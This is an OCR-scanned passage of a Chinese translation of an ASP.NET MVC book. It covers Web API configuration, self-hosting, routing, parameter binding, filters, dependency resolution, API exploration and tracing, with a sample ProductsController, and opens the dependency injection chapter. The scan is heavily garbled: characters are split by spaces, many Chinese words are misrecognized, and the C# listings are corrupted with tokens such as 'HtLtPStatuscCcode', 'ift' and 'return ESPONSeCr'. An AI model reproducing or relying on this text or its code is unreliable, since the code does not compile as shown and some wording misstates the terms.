可 以 构建 一 个 新 响应 并 抛 出 响应 异常 ， 然 后 Web API 框架 就 像 操 作 直 接 返 回 的 响应 消息 那 
样 进行 处 理 。 然 后 , 成功 的 啊 应 可 以 继续 返回 原始 的 对 象 数 据 ， 增加 简单 单元 测试 的 好 处 。 

关于 操作 返回 值 的 最 后 说 明 : 如 果 操 作 本 质 上 就 是 异步 的 ， 就 是 操作 中 使 用 了 其 他 异 
步 API， 我 们 可 以 把 操作 返回 值 的 签名 改 为 Task<T>， 并 使 用 NET 4.5 中 的 异步 等 待 特性 
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来 把 我 们 的 顺序 代码 天 衣 无 缝 地 转换 成 异步 代码 。Web API 理解 操作 返回 Task<T> 的 时 间 ， 
它 应 该 人 简单 地 等 每 任务 完成 ， 然 后 解 开 T 类 型 的 返回 对 象 ， 从 逻辑 上 就 像 操 作 直 接 返 回 的 
- 样 。 


11.4 生 直 Web API 


我 们 可 能 极 想 知道 控制 器 上 的 Configuration 属性 。 在 传统 的 ASPNET 应 用 程序 中 ， 
应 用 程序 配置 在 Global.asax 中 完成 ， 应 用 程序 使 用 全 局 状态 (包括 静态 的 和 线程 局 部 变量 ) 
访问 请 求 和 应 用 程序 配置 。 

Web API 被 设计 为 不 具有 任何 这 样 的 静态 全 局 值 , 而 把 它 的 配置 放 在 HttpConfiguration 
类 中 。 这 对 应 用 程序 设计 有 两 方面 影响 : 第 一 ， 可 在 一 个 应 用 程序 中 运行 多 个 Web API 服 
务 器 ， 因 为 每 个 服务 器 有 和 它 目 身 的 非 全 局 配置 ; 第 二 ， 可 在 Web API 中 更 方便 地 运行 单元 
测试 和 奖 到 端 测 试 ， 因 为 我 们 把 配置 包含 在 了 一 个 非 全 局 对 象 中 ， 由 于 静态 可 以 使 平行 测 
试 更 具 挑战 性 。 配 置 类 包含 访问 以 下 项 ; 

e 路 由 

e 为 所 有 请 求 运行 的 过 滤器 

e 参数 绑 定 规则 

e 读 写 主体 内 容 使 用 的 默认 格式 吉 

e Web API 使 用 的 默认 服务 

e 用 户 提供 的 依赖 解析 蜗 ( 针 对 服务 和 控制 器 上 的 DD 

e HTTP 消息 处 理 程 序 

e 标记 是 否 包 含 像 堆栈 跟踪 这 样 的 错误 细节 

e 可 以 存放 用 户 定义 值 的 Properties 袋 

创建 和 访问 这 些 配置 的 方式 取决 于 我 们 如 何 托管 应 用 程序 : 在 ASPNET 内 ， 还 是 在 
WCF 自 托 管内 。 


11.4.1 Web 托管 Web API 的 配置 


默认 的 MVC 项 目 模板 都 是 Web 托管 项 目 , 因 为 MVC 仅 支 持 Web 托管 。 在 App Startup 


文件 夹 中 ， 我 们 会 看 到 MVC 应 用 程序 的 启动 配置 文件 。Web API 配置 代码 在 文件 
WebApiConfig.cs( 或 .vb) 中 ， 代 码 如 下 : 


public static class WebApiConfig I 
public static void Register (HttpConfiguration config) (| 
config.Routes.MapHttpRoute ( 
name: "DefaultApi", 
routeTemplate: "api/{controller}/{id}", 
defaults: new { id = RouteParameter.Optional } 
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开发 人 员 会 修改 这 个 文件 以 满足 他 们 目 己 应 用 程序 的 需求 。 默 认 会 包含 一 个 路 由 示例 。 

如 末 碍 看 Global.asax 文件 内 容 ， 会 发 现 这 个 函数 通过 传 进 GlobalConfiguration. 
Configuration 对 象 来 调用 。Web 托管 的 Web API 仅 支 持 单一 服务 器 和 单一 配置 文件 ， 开 发 
人 员 不 需要 创建 这 些 文 件 ， 只 需要 正确 地 配置 它们 。GlobalConfiguration 类 在 程序 集 
System.Web.Http.WebHostdll 中 , 它 是 基础 设施 的 其 余部 分 , 用 来 文 持 Web 托管 的 Web API。 
11.4.2” 自 托管 Web API 的 配置 


与 Web API 一 起 发 布 的 其 他 托管 是 基于 WCF 的 自 托管 。 自 托管 的 代码 包含 在 程序 集 
System.Web.Http.SelfHost.dll 中 。 

没有 针对 目 托 管 的 内 置 项 目 模板 , 因为 这 样 没有 项 目 类 型 限制 , 当 需 要 使 用 目 托管 时 ， 
我 们 束 可 以 使 用 。 我 们 可 能 正 托管 在 一 个 控制 台 应 用 程序 中 ， 或 者 在 一 个 GUI 应 用 程序 内 
部 ,甚至 在 一 个 Windows 服务 中 。 在 应 用 程序 中 使 Web API 运 行 的 最 简单 方式 是 使 用 NuGet 
安装 目 托管 Web API 包 ， 它 的 名 称 是 Microsoft.AspNet.WebApi.SelfHost， 安 装 之 后 就 会 日 
动 包 含 所 有 System.Net.Http 和 System.Web.Http 依赖 。 

当 使 用 目 托 管 时 ， 我 们 需要 正确 地 创建 配置 ， 司 动 和 停 上 Web API 服务 器 。 我 们 需要 
实例 化 的 配置 类 是 HttpSelfHostConfiguration， 因 为 它 通 过 要 求 一 个 监听 的 URL 扩展 了 基 
类 HttpConfiguration。 正 确 配 置 好 之 后 ， 束 会 创建 一 个 HttpSelfHostServer 实例 ， 然 后 告诉 
它 开 始 监 听 。 

下 面 是 目 托 管 司 动 代码 的 一 个 示例 片段 : 


var config = new HttpSelfHostCconftiguration("http:// /localhost :80807") 7; 


config.Routes .MapHLLPRoute 
name: "DefaultApi", 
routeTemplate: "api/{controller}/{id}", 
defaults: new { id = RouteParameter.Optional | 


下 


Var server = new HttpSelfHostServer (configq}; 
server.OpenAsync() .Wait (); 
完成 之 后 ， 我 们 应 该 关闭 服务 器 : 


Server.CloseAsync(}) .Wait (1) ， 


如 果 在 控制 台 应 用 程序 中 是 目 托管 ， 我 们 应 该 在 Main 函数 中 运行 这 些 代 码 。 对 于 其 
他 应 用 程序 类 型 的 目 托 管 ， 只 需要 找到 合适 位 置 以 运行 应 用 程序 的 局 动 和 关闭 代码 ， 并 运 
行 这 些 代 码 即 可 。 这 两 种 情况 下 ， 如 果 应 用 程序 开发 框架 允许 编写 异步 启动 和 关 财 代码 ， 
我 们 可 以 (应 该 ) 用 异步 代码 一 一 async 和 await 一 一 代替 .Wait0 调 用 。 
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11.4.3 第 三 方 托 管 配置 


Web API 的 托管 系统 是 可 插 拔 的 。 这 些 托管 配置 独立 于 托管 系统 ， 因 此 我 们 可 以 得 阅 
托管 文档 来 学 习 如 何 完 成 配置 。 


注意 ”编写 第 三 方 托管 的 主题 超出 了 本 书 的 讨论 范围 。 如 果 对 编写 Web API 
托管 感 兴趣 ， 请 在 ASPNET Web API 论坛 参与 讨论 ， 网 址 为 http://forums.asp.net/ 
1246.aspx. 


11.5 回 Web API 添加 路 由 


正如 前 一 节 中 所 讲 的 ，Web API 的 主要 路 由 注册 是 MapHttpRoute 扩展 方法 。 与 所 有 
Web API 配置 任 务 一 样 ， 为 应 用 程序 的 路 由 配置 了 HttpConfiguration 对 象 。 

如 果 查 看 配置 对 象 ， 我 们 会 发 现 Routes 属性 指向 HttpRouteCollection 类 的 一 个 实例 ， 
而 不 是 ASPNET 的 RouteCollection 类 实例 。Web API 提供 了 一 些 直接 依赖 ASPNET 中 
RouteCollection 类 的 MapHttpRoute 版 本 ， 但 这 些 路 由 只 有 在 目 托管 时 才能 使 用 ， 因 此 ， 笔 
者 推荐 (和 项 目 模 板 鼓 励 ) 使 用 HttpRouteCollection 上 的 MapHttpRoute 版 本 。 

Web API 路 由 系统 使 用 的 路 由 逻辑 与 MVC 一 样 ， 都 能 用 来 帮助 决定 哪个 URI 应 该 路 
由 到 应 用 程序 的 API 控制 器 。 因 此 ， 我 们 从 MVC 学 习 的 概念 可 以 应 用 到 Web API， 比 如 
路 由 匹配 模式 、 默 认 和 约束 。 为 避免 Web API 拥有 ASPNET 的 硬 依赖 ， 开 发 团队 采用 了 
ASPNET 路 由 代码 的 副本 ， 并 把 它 移植 到 Web API。 修 改 这 个 代码 的 行为 方式 在 一 定 程度 
上 会 依赖 于 我 们 的 托管 环境 。 

当 在 自 托管 环境 中 运行 时 ，Web API 会 使 用 它 自 己 的 私有 路 由 代码 副本 ， 这 里 的 路 由 
代码 副本 是 从 ASPNET 移植 到 Web API 中 的 。Web API 中 的 路 由 与 MVC 中 的 路 由 几乎 一 
样 ， 但 类 名 稍 有 不 同 ， 例 如 HttpRoute 和 Route。 图 11-2 展示 了 自 托 管 管道 。 

当 应 用 程序 是 Web 托管 时 ，Web API 会 使 用 ASPNET 的 内 置 路 由 引擎 ， 因 为 它 已 经 
连接 到 了 ASPNET 请 求 管道 。 当 在 Web 托管 环境 中 注册 路 由 时 ， 系 统 就 不 只 会 注册 
HttpRoute 对 象 ， 也 会 目 动 创建 封装 Route 对 象 ， 并 在 ASPNET 路 由 引擎 中 注册 这 些 对 象 。 
目 托管 和 Web 托管 之 间 的 主要 区 别 在 于 路 由 的 运行 时 刻 ;， 对 于 Web 托管 ，ASPNET 运行 
路 由 非常 早 ; 但 在 自 托 管 情 形 中 ，Web API 运行 路 由 的 时 刻 就 非常 晚 。 如 果 编 写 消 息 处 理 
程序 ， 知 道 我 们 可 能 无 法 访问 路 由 信息 是 很 重要 的 ， 因 为 此 时 路 由 可 能 尚未 运行 。 图 11-3 
展示 了 Web 托管 的 管道 。 
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消息 处 理 程序 


|， 
API 控制 器 


图 11-2 图 11-3 


API 控制 器 


默认 的 MVC 路 由 与 默认 的 Web API 路 由 之 间 最 显著 的 差异 在 于 ， 后 者 缺少 {action} 
指令 。 正 如 前 面 讨论 的 ，Web API 操作 默认 根据 请 求 使 用 的 HITP 动词 来 调度 。 然 而 ， 
可 以 通过 使 用 路 由 中 的 {faction} 匹 配 指令 或 通过 回路 由 的 默认 值 中 添加 一 个 action 值 来 重 
写 这 个 映射 。 当 路 由 包含 一 个 action 值 时 ，Web API 就 会 使 用 操作 名 称 查 找 合 适 的 操作 
大 

甚至 当 使 用 基于 操作 名 称 的 路 由 时 ， 仍 然 可 以 使 用 默认 的 动词 映射 ;也 融 是 说 ， 如 果 
操作 名 称 以 一 个 常见 的 动词 名 称 (Get、Post、Put、Delete、Head、Patch 和 Options) 开 头 ， 
然后 这 个 操作 就 可 以 匹配 名 称 开 头 对 应 的 动词 。 对 于 名 称 不 能 匹配 第 见 动词 的 所 有 操作 ， 
默认 支持 的 动词 是 POST。 应 该 使 用 [HttpXyz] 特 性 家 族 或 [AcceptVerb] 特 性 来 装饰 操作 ， 以 


11.6 ” 绑 定 参数 


前 面 关 于 “主体 值 ” 和 “ 非 主 体 值 ” 的 讨论 引导 我 们 继续 讨论 格式 器 和 模型 绑 定 右 ， 
因为 这 两 个 类 分 别 负 责 处 理 主体 和 非 主 体 值 。 当 我 们 编写 操作 方法 签名 时 ， 一 方面 来 说 ， 
来 目 主 体 的 复杂 类 型 通 币 意味 独 由 格式 句 负 责 生 成 从 另 一 方面 说 ， 来 目 非 主体 的 简单 类 
型 通常 意味 痢 由 模型 绑 定 器 负责 生成 。 对 于 将 要 发 送 的 主体 内 容 ， 我 们 使 用 格式 器 来 解码 

为 了 完整 介绍 内 容 ， 我 们 需要 提出 一 个 Web API 的 新 概念 : 参数 绑 定 。Web API 使 用 
参数 绑 定 右 来 决定 如 何 为 各 个 参数 提供 值 。 特 性 可 以 用 来 影响 这 个 决定 ， 比 如 我 们 之 前 使 
用 MVC 时 看 到 的 特性 [ModelBinder]， 但 当 没 有 和 草 写 方法 有 影响 绑 定 决定 时 ， 默 认 的 逻辑 使 
用 简单 类 型 和 复合 类 型 。 

参数 绑 定 系统 通过 查看 操作 参数 寻找 ParameterBindingAttribute 派生 的 属性 。Web API 
中 创建 有 一 些 这 样 的 特性 ， 如 表 11-1 所 示 。 上 此外， 还 可 以 通过 在 配置 文件 中 注册 或 者 通过 
编写 基于 ParameterBindingAttribute 的 特性 , 来 注册 不 使 用 模型 绑 定 器 和 格式 需 的 目 定 义 参 
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表 11-1 参数 绑 定 特性 
特 性 描述 
该 特性 告诉 参数 绑 定 系统 使 用 模型 绑 定 ， 也 就 是 通过 使 用 注册 模型 绑 定 器 
ModelBindingAttribute | 和 值 提供 器 创建 值 
这 就 是 通过 简单 类 型 参数 的 默认 绑 定 罗 辑 表示 的 内 容 
该 特性 是 一 个 专门 的 ModelBindingAttribute， 它 告诉 系统 只 能 使 用 实现 了 
IUriValueProviderFactory 的 值 提供 器 ， 从 而 限制 值 的 范围 ， 确 保 它 们 只 能 


FromUriAttribute 
从 URI 获取 
开 箱 即 用 ， 路 由 数据 和 Web API 中 的 查询 字符 串 值 提供 器 实现 了 这 个 接口 
该 特性 告诉 参数 绑 定 系统 使 用 格式 器 , 也 就 是 通过 得 找 MediaTypeFormatter 
的 实现 创建 值 ， 这 里 MediaTypeFormatter 可 以 解码 主体 ， 从 解码 主体 数据 
FromBodyAttribute 


中 创建 给 定 类 型 
这 就 是 通过 任何 复合 类 型 的 默认 绑 定 逻辑 表示 的 内 容 


参数 绑 定 系统 与 MVC 的 工作 方式 完全 不 同 。 在 MVC 中 ， 所 有 参数 都 是 通过 模型 绑 
定 创 建 。Web API 模型 绑 定 的 工作 方式 与 MVC( 模 型 绑 定 器 和 提供 器 ， 值 提供 器 和 工厂 ) 几 
平一 样 ， 尽 管 它 稍微 重 构 了 基于 MVC Futures 中 的 备用 模型 绑 定 系 统 。 针 对 数组 、 集 合 、 
字典 、 简 单 类 型 甚至 复合 类 型 ， 我 们 会 发 现 有 对 应 的 内 置 模型 绑 定 器 ， 尽 管 需要 使 用 
[ModelBinder] 来 运行 这 些 绑 定 器 。 虽 然 接 口 有 轻微 改动 ， 但 是 如 果 知 道 如 何在 MVC 中 编 
写 模型 绑 定 器 和 值 提供 器 ， 那 么 我 们 也 能 为 Web API 做 同样 的 事情 。 

格式 器 是 一 个 Web API 的 新 概念 。 格 式 器 主要 负责 使 用 和 生成 主体 内 容 。 我 们 可 以 把 
格式 器 想象 成 .NET 中 的 序列 化 器 (serializers): 负责 编码 和 解码 出 入 主题 内 容 宇 节 流 的 目 定 
义 复 合 类 。 我 们 可 以 把 一 个 对 象 精确 编码 到 主体 ， 也 可 以 从 主体 中 精确 解码 一 个 对 象 ， 虽 
然 对 象 可 以 包含 嵌 套 对 象 ， 正 如 .NET 中 的 复合 类 型 。 

我 们 会 在 Web API 内 部 发 现 三 种 格式 器 : 一 种 使 用 Json.NET 编码 和 解码 JSON， 一 种 
使 用 DataContractSerializer 或 XmlSerializer 编 妈 和 解码 XML， 另 一 种 解码 表单 URL，, 编 妈 
主体 数据 ， 这 些 数 据 都 来 自 浏览 器 表单 提交 。 每 一 个 格式 器 都 非常 强大 ， 都 会 努力 把 它 支 
持 的 格式 转 码 到 我 们 选择 的 类 。 
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注意 虽然 大 多 数 Web API 都 被 设计 来 支持 编写 API 服务 器 ， 但 是 内 置 
的 JSON 和 XML 格式 器 对 客户 端 应 用 程序 也 同样 有 用 。System.Net.Http 中 的 
HTTP 类 都 是 关于 原始 的 HITP， 不 包含 任何 类 型 对 象 到 内 容 的 映射 系统 ， 比 
如 格式 器 。 

Web API 团队 选择 把 格式 器 放 入 单独 的 DDL 中 ， 这 里 DLL 名 为 
System.Net.Http.Formatting。 由 于 这 个 DLL 除了 System.Net.Http 之 外 没有 任何 
依赖 , 因此 它 在 客户 端 和 服务 器 HTTP 编码 中 均 可 应 用 一 一 一 个 非常 大 的 好 处 
就 是 ， 我 们 编写 的 基于 .NET 的 客户 端 应 用 程序 可 以 使 用 我 们 编写 的 Web API 
服务 。 

DLL 包含 一 些 对 HttpClient、HttpRequestMessage 和 HttpResponseMessage 
有 益 的 扩展 方法 ,这 样 我 们 就 可 以 在 客户 端 和 服务 器 应 用 程序 中 容 势 地 使 用 内 
置 格式 。 注意， 表单 URL 编码 格式 器 放 在 这 个 DLL 中 , 但 由 于 它 只 能 解码 浏 
览 器 提交 的 表单 数据 ， 因 此 我 很 可 能 限制 值 于 客户 端 应 用 程序 。 


11.7 ”过 小 请 来 


在 ASPNET 中 ， 使 用 特性 过 滤 请 求 的 能 力 从 1.0 版 本 都 已 引入 ,添加 全 局 过 滤器 的 能 
力 在 MVC 3 中 引入 。ASPNET Web API 包含 这 两 个 特征 ， 但 正如 前 面 讨论 的 ， 全 局 过 小 
颖 在 配置 级 别 , 而 不 在 应 用 程序 级 别 ,由 于 Web API 中 没有 这 样 应 用 程序 范 轩 的 全 局 特征 。 

相对 于 MVC，Web API 的 改进 之 一 是 过 滤器 现在 是 异步 管道 的 一 部 分 ,并 总 是 定义 成 
异步 。 如 果 过 滤器 可 以 从 异步 中 获 益 ， 例 如 ， 记 录 异 步 数据 源 (比如 数据 库 或 文件 系统 ) 的 
异常 失败 ， 然 后 就 可 以 这 样 做 。 然 而 ，Web API 团队 也 意识 到 有 时 强制 编写 异步 代码 存在 
不 必要 的 开销 ,特别 是 当 在 .NET 4 平台 上 开发 时 ,不 能 访问 async 和 await， 所 以 开发 团队 
也 创建 苛 于 特性 的 同步 其 类 ， 实 现 了 这 三 个 过 滤 融 接口 。 当 移植 到 MVC 过 滤 堪 时 ， 使 用 
这 些 基 类 可 能 是 开始 最 简单 的 方式 。 如 果 过 滤器 需要 实现 过 滤器 管道 的 多 个 阶段 ， 比 如 操 
作 过 滤器 和 异 利 过 滤器 ， 就 没有 辅助 基 类 和 接口 需要 精确 实现 。 

开发 人 员 可 以 针对 一 个 操作 在 操作 级 使 用 过 滤器 ， 也 可 以 针对 一 个 控制 器 的 所 有 操 
作 ， 在 控制 器 级 别 使 用 过 滤器 ， 设 置 可 以 针对 配置 中 的 所 有 控制 器 和 所 有 操作 ， 在 配置 级 
别 使 用 过 滤器 。Web API 包含 一 个 过 小 器 供 开 发 人 员 使 用 AuthorizeAttribute。 与 MVC 对 
应 特性 几乎 一 样 , 这 个 特性 可 用 来 装饰 需要 认证 的 操作 , 并 且 该 特性 还 包括 可 以 选择 性 “ 撤 
消 ”AuthorizeAttribute 的 AllowAnonymousAttribute。Web API 团队 也 发 布 了 一 个 惠 外 的 
NuGet 包 来 文 持 一 些 OData 相关 的 功能 ,包括 可 以 目 动 文 持 OData 查询 语法 ( 像 $top 和 $filter 
三 询 字符 串 值 ) 的 QueryableAttribute。 
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表 11-2 总 结 了 过 滤器 接口 和 基 类 。 


表 11-2 过 滤器 接口 和 基 类 
异步 接口 
同步 基 类 
IAuthorizationFilter 认证 过 滤器 可 以 在 参数 绑 定 发 生 以 前 运行 ， 它 们 计划 过 滤 没 有 正确 认 
AnuthorizationFilterAttribute | 证 且 请 求 争议 操作 的 请 求 
认证 过 滤器 先 于 操作 过 滤器 运行 


用 和 途 


IActionFilter 操作 过 滤器 在 参数 绑 定 发 生 ， 并 封装 API 操作 方法 调用 之 后 运行 ， 多 

ActionFilterAttribute 许 在 调度 操作 之 前 ， 完 成 执行 之 后 拦截 。 操 作 过 滤器 的 目标 是 允许 开 
发 人 员 增 加 和 /或 奉 换 操作 的 输入 值 和 /或 输出 结果 

IExceptionFilter 当 调 用 的 操作 抛 出 异常 时 ， 就 会 调用 异常 过 滤器 。 异 常 过 滤器 可 以 检 

ExceptionFilterAttribute 查 异 常 ， 并 采取 一 些 操作 ， 比 如 记录 日 志 ; 它 也 能 选择 地 通过 提供 新 
的 啊 应 对 象 来 处 理 异常 


在 Web API 中 ， 没 有 与 MVC 中 的 HandleError 等 价 的 特性 。MVC 对 错误 的 默认 行为 
是 返回 ASPNET“ 黄 屏 错 误 ?”， 当 应 用 程序 生成 HIML 时 ， 这 是 正确 的 ， 或 许 这 不 是 完全 
用 户 友 好 的 。HandleError 特性 允许 MVC 开发 人 员 使 用 上 自 定义 的 视图 蔡 换 这 | 从 另 

方面 来 说 ，Web API 应 该 始终 尝试 返回 结构 化 的 数据 ， 包 插 当 错误 条 件 满足 时 ， 它 拥有 
内 置 的 支持 ， 把 错误 信息 序列 化 反馈 给 终端 用 户 。 和 希望 重 写 这 os 
他 们 自己 的 错误 处 理 程序 过 滤器 ， 并 把 它 注 册 在 配置 级 别 。 


11.8 ”局 用 依赖 注入 


ASPNET MVC 3 为 依赖 注入 容器 引入 了 限制 支持 ,以 提供 内 并 MVC 服务 和 成 为 非 服 
务 类 ( 像 控 制 器 和 视图 ) 工 厂 的 能 力 。Web API 已 经 效仿 类 似 的 功能 ， 但 有 两 个 关键 差异 。 

第 一 ，MVC 使 用 一 些 静 态 类 作为 MVC 使 用 默认 服务 的 容器 。Web API 的 配置 对 象 为 
这 些 静 态 类 替换 需求 ， 因 此 开发 人 员 可 以 查看 和 修改 通过 访问 HttpConfiguration.Services 
列举 的 默认 服务 。 

第 二 ，Web API 的 依赖 解析 器 引入 了 “范围 ”的 概念 。 范 围 可 以 看 成 依赖 注入 容器 跟 
踪 对 象 的 方式 ， 这 里 的 对 象 是 它 在 特定 上 下 文中 分 配 的 ， 这 样 我 们 就 可 以 很 容易 地 一 次 性 
清除 这 些 对 象 。Web API 的 依赖 解析 器 使 用 两 种 范围 : 

e 每 配置 (per-configuration) 范 围 一 一 全 局 服务 配置 ， 当 配置 清理 时 清除 

e 局 部 请 求 一 一 针对 给 定 请 求 上 下 文中 创建 的 服务 ， 比 如 控制 器 使 用 的 服务 ， 当 请 求 

完成 时 清除 

第 13 半 详 细 介 绍 了 在 MVC 和 Web API 中 如 何 使 用 依赖 注入 ，, 如果 想 详细 地 学 习 , 请 

参阅 。 
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11.9 ”探索 API 编程 


MVC 应 用 程序 的 控制 器 和 操作 通 癌 是 一 个 专门 事务 ， 单 独 设计 用 来 满足 应 用 程序 中 
HTML 的 现实 需求 。 从 另 一 方面 来 说 ，Web API 倾向 于 更 加 有 序 。 在 运行 时 发 掘 API 的 能 
力 使 开发 人 员 能 够 和 Web API 应 用 程序 一 起 提供 关键 功能 ， 其 中 包括 目 动 生成 帮助 页 面 和 
测试 客户 端 UI。 

开发 人 员 可 从 HttpConfiguration.Services 获取 IApiExplorer 服务 ， 并 用 它 来 编程 探索 
服务 公开 的 API。 例如 ，MVC 控制 器 可 以 从 Web API 返回 IApiExplorer 实例 到 Razor 代码 
片段 ， 列 举 所 有 可 用 的 API 端点 。 代 人 码 的 输出 如 图 11-4 所 示 。 


GET api/Values 
GET api/Values/{id)} 


Parameters 


" Id (FromUnm) 


POST api/Values 


Parameters 


。 Value (tromBody) 


PUT api/Values/{id} 


Parameters 
sa Id (FremUn) 
= Value (FromBody) 


DELETE api/Values/{fid} 
Parameters 


图 11-4 


Gmodel System.Web.Http.Description.TIApiExplorer 


aforeach (var api in Model.ApiDescriptions) { 
<hl>@api.HttpMethod fapi.RelativePath</hl> 


ift (apli.ParameterDescriptions.Any()) I 
<h?2>Parameters</h2> 
<uUul> 
aforeach (var param in api.ParameterDescriptions) { 
<1i>lparam.Name (Q@param.SsSource)</l1i> 
} 


</ul> 
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除了 目 动 发 现 的 信息 之 外 ,开发 人 员 还 可 以 实现 IDocumentationProvider 接口 来 使 用 文 
档 文本 提供 API 描述 ， 这 些 可 以 用 来 提供 丰富 的 信息 和 测试 客户 端 功能 。 由 于 文档 是 可 插 
拔 的 ， 开 发 人 员 可 以 选择 以 任何 需要 的 格式 存储 这 些 文档 ， 包 插 特 性 、 独 立 文件 、 数 据 库 
表 或 其 他 最 适合 应 用 程序 的 构建 过 程 。 


11.10 ”跟踪 应 用 程序 


远程 部 署 代 码 最 大 的 一 个 挑战 便 是 调试 远程 出 错 的 程序 。Web API 启用 一 个 功能 丰富 
的 目 动 跟踪 生态 系统 ， 虽 然 跟 踩 系 统 默 认 是 关闭 的 ， 但 开发 人 员 可 以 根据 需要 开局 。 内 置 
的 跟踪 功能 封装 了 很 多 内 置 组 件 ， 可 关联 各 个 请 求 的 数据 ， 因 为 它 在 整个 系统 层 层 移动 。 

跟踪 的 核心 部 分 是 TTraceWriter 服务 。Web API 没有 附带 这 项 服务 的 任何 实现 ， 之 所 
以 这 样 ， 是 因为 开发 人 员 预 计 可 能 已 经 有 他 们 目 己 喜欢 的 跟踪 系统 ， 比 如 ETW、log4net、 
ELMAH 或 其 他 许多 跟踪 系统 。 相 反 ，Web API 查看 启动 ， 以 确定 是 否 在 服务 列表 中 有 
ITraceWriter 的 实现 ， 如 果 有 ， 会 目 动 开 始 跟踪 所 有 请 求 。 开 发 人 员 必 须 选 择 最 好 的 方式 
来 存储 和 浏览 这 些 跟踪 信息 一 一 通常 情况 下 ， 通 过 使 用 选择 的 日 志 系 统 提供 的 配置 选项 来 

应 用 程序 和 组 件 开发 人 员 也 可 以 通过 检索 ITraceWriter 服务 (如 果 不 为 noll， 束 添加 跟 
踪 信 息 ) 癌 上 自己 开发 的 系统 中 添加 跟 中 支持。 核心 ITraceWriter 接口 只 包含 一 个 Trace 方法 ， 
但 也 有 一 些 扩 展 方法 ， 这 些 扩展 方法 使 得 跟踪 不 同 级 别 的 信息 (调试 、 信 息 、 和 敬告、 错误 和 
致命 的 消 奶 ) 变 得 容易 ， 还 有 一 些 可 以 用 来 跟 中 条 目的 辅助 方法 ， 以 及 同步 和 异步 的 退出 
pn 


11.11 Web API 示例 : ProductsController 


下 面 是 一 个 Web API 控制 器 示例 ， 它 通过 Entity Framework 的 Code First 特征 展示 了 
-个 简单 数据 对 象 。 为 了 文 持 这 个 示例 ， 我 们 需要 三 个 文件 : 

e 模型 一 一 Product.cs( 程 序 清单 11-3) 

e 数据 库 上 下 文 DataContext.cs( 程 序 清单 11-4) 

e Web API 控制 器 ProductsController.cs( 程 序 清单 11-5) 


程序 清单 11-3: Product.cs 


public class Product 

{ 
public int ID { get; set; } 
public string Name { get; set; } 
public decimal Price { get; Set | 
public int UnitsInstock 1{ get; set; 上 
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程序 清单 11-4: DataContext.cs 


public class DataContext : DbContext 
{ 
public DbhSet<Product> Products { get; set; } 


程序 清单 11-5: ProductsController.cs 


public class ProductsController : ApiController 
{ 


private DataContext db = new DataContext () 1， 


// GET api/Products 
public IEnumerable<Product> GetProducts () 
{ 


return ab .ProductsS ; 


// GET api/Products/5 
public Product GetProduct (int 1d) 
{ 
Product product = db.Products.Find(id); 
if (product == null) 
{ 
throw new HttpResponseException ( 
Request .CreateResponse( 
HttpStatusCode.NotFound) ) ; 
} 


return product; 


// PUT api/Products/5 
public HttpResponseMessage PutProduct(int id, Product product) 
{ 

ift (Modelstate.IlIsValid && 1d == product.1ID) 


{ 
db.Entry (product) .State = EntityState.Modified; 


try 
L 

db.SaveChanges ();}; 
} 
catch (DbUpdateConcurrencyExcept1ion) 
L 

return 

Request.CreateResponse | 
HttpSsStatusCode.NotFound); 
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return 
Request .CreateResponse ( 
HtLtPStatuscCcode .OK， product); 


} 


el] se 


{ 
return 
Request .CreateResponse ( 
HtLtPStatuscCcode .BadRedquest) 


// POST api/Products 
public HttpResponseMessage PostProduct (Product product) 


{ 


ift (ModelSstate.IsValid) 
{ 
db.Products.Add (product);} 
db.SaveChanges () ， 
HttpResponseMessage response = 
Request -CreateResponse ( 
HttpStatusCode.Created, product).; 
response.Headers.Location = 
new Uri (Url .Link i'l 
"DefaultApi", 
new { id = product.ID })); 


return ESPONSeCr 


} 
else 
{ 
return 
Request .CreateResponsel( 
HttpStatusCode.BadRequest)} 


// DELETE api/Products/5 
public HttpResponseMessage DeleteProduct (int 1d) 


Product product = db.Products.Find(id); 
if (product == null) 
{ 
return 
Request .CreateResponse( 
HLtPStatuscCcode .NotEound) ; 
} 


db .Products .Remove (product)}); 
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try 
{ 
db.SaveChanges () :; 
} 
catch (DbUpdateConcurrencyExcept1ion,) 
{ 
return 
Request .CreateResponse ( 
HttpstatusCode .NotFound),; 
} 
return 
Request .CreateResponse ( 
HttpstatusCode .OK, product); 
} 
protected override void Dispose (bool disposing) 
{ 
db .Dispose (); 
base.Dispose (disposing); 


11.12 小 纺 


ASPNET Web API 是 一 个 功能 强大 的 新 方式 ， 可 以 用 来 癌 我 们 已 有 的 或 新 创建 的 Web 


应 用 程序 中 添加 API。MVC 开发 人 员 会 发 现 熟 悉 的 基于 控制 融 的 编程 模型 ，WCF 开发 人 


员 会 发 现 与 基于 MVC 的 服务 系统 相 比 ，Web API 对 Web 托管 和 自 托管 的 支持 是 一 个 额外 
的 红利 。 当 与 Visual Studio 2012 和 .NET 4.5 结合 使 用 时 ， 异 步 设 计 人 允许 我 们 的 Web API 得 
到 高 效 扩展 ， 同 时 可 以 维护 一 个 舒适 的 顺序 编程 模型 。 


| 


代 赖 注入 


本 章 主要 内 容 

。 软件 设计 模式 

e 依赖 解析 器 在 MVC 的 用 法 

。 依赖 解析 如 在 Web API 的 用 法 


从 第 3 个 版 本 开始 , ASPNET MVC 引入 了 一 个 新 概念 : 依赖 解析 器 (dependency resolver)。 
这 极 大 地 增强 了 应 用 程序 参与 依赖 注入 的 能 力 ， 以 更 好 地 在 MVC 使 用 的 服务 和 通常 创建 
的 一 些 类 (如 控制 器 和 视图 页 面 ) 之 间 建 立 依赖 关系 。 

为 更 好 地 理解 依赖 解析 器 的 工作 原理 ， 下 面 首 先 定义 一 些 它 所 用 到 的 通用 软件 模式 。 
如 果 已 经 熟悉 了 像 服务 定位 (service location) 和 依赖 注入 这 样 的 设计 模式 ， 那 么 完全 可 以 浏 
览 甚 至 跳 过 12.1 节 的 内 容 ， 直 接 学 习 12.2 节 “MVC 中 的 依赖 解析 ”。 


12.1 软件 设计 模式 


为 更 好 地 理解 依赖 注入 的 概念 ， 以 及 如 何 将 其 应 用 于 MVC 程序 中 ， 前 先 了 解 一 下 软 
件 设计 模 陈 是 很 有 必要 的 。 软 件 设计 模式 主要 用 来 规范 问题 及 其 解决 方案 的 描述 ， 以 人 向 化 
开 友 人 员 对 和 见 问题 及 其 对 应 解决 方案 的 标识 与 交流 。 

设计 模式 并 不 是 新 育 的 友 明 ， 而 是 为 行业 中 篆 见 的 实践 给 出 一 个 正式 的 名 称 和 定义 。 
当 和 学 习 一 个 设计 模式 时 ， 我 们 很 有 可 能 意识 到 在 过 去 解决 问题 的 方案 中 使 用 过 它 。 
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设计 模式 

模式 和 模式 语言 的 概念 通常 归功 于 Christopher Alexander、Sara Ishikawa 和 Murray 
